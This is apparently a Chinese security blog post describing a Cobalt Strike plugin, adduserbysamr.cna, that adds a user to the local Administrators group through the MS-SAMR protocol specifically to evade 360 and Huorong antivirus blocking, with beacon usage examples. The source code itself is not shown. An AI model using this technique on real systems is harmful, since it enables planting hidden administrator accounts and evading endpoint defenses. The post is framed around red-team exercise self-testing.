绕过360/某绒添加管理用户CS插件

简介: 绕过360/某绒添加管理用户CS插件


hw攻防演练期间,工具安全性自测!


工具简介

这个插件是通过MS-SAMR协议将用户添加到理员,所以暂时可以用来绕过部分防护添加管理员用户。


工具使用

我们在cobaltstrike中使用shell、execute、run几个命令添加用户时都会被360等防护拦截,如下图所示。

加载adduserbysamr.cna,使用adduserbysamr命令通过samr将用户添加到localgroup,groupName默认为“Administrators”,请勿在AD中使用。

    beacon> help adduserbysamr
    Use: adduserbysamr [username] [password] [groupName]
    e.g: adduserbysamr sysadmin p@ssw0rd
         adduserbysamr sysadmin p@ssw0rd Administrators
         adduserbysamr sysadmin p@ssw0rd "Remote Desktop Users"


    绕过360成功添加管理员用户...,我们还可以修改下这个项目代码集成到自己的cobaltstrike插件中使用。

    相关文章
    |
    2月前
    |
    存储 安全 PHP
    安全开发-PHP应用&文件管理模块&显示上传&黑白名单类型过滤&访问控制&文件管理模块&包含&上传&遍历&写入&删除&下载&安全
    安全开发-PHP应用&文件管理模块&显示上传&黑白名单类型过滤&访问控制&文件管理模块&包含&上传&遍历&写入&删除&下载&安全
    |
    2月前
    |
    安全 数据可视化 JavaScript
    【内网安全】域信息收集&应用网络凭据&CS插件&Adfind&BloodHound
    【内网安全】域信息收集&应用网络凭据&CS插件&Adfind&BloodHound
    |
    3月前
    |
    存储 算法 C语言
    【C/C++ 应用开发 检测文件 】详解 C/C++ 中常用的 5 种文件存在检查方式
    【C/C++ 应用开发 检测文件 】详解 C/C++ 中常用的 5 种文件存在检查方式
    109 0
    |
    10月前
    |
    Java 数据安全/隐私保护 Windows
    绕过一切扫描,加强版CS发布
    绕过一切扫描,加强版CS发布
    |
    测试技术
    Cypress系列(56)- 避免访问多个站点
    Cypress系列(56)- 避免访问多个站点
    130 0
    Cypress系列(56)- 避免访问多个站点
    第三方应用授权接入流程(.NET版)
    第三方应用授权注意事项:[url]https://openclub.alipay.com/read.php?tid=14575&fid=68[/url] 一、调用接口 1、访问授权,获取app_auth_code 获取app_auth_code方式:[url]https://openclub.
    1581 12
    |
    Java Android开发
    CC框架实践(1):实现登录成功再进入目标界面功能
    用CC来AOP地实现登录成功后再跳转到目标界面功能
    1541 0
    |
    网络协议 网络架构 iOS开发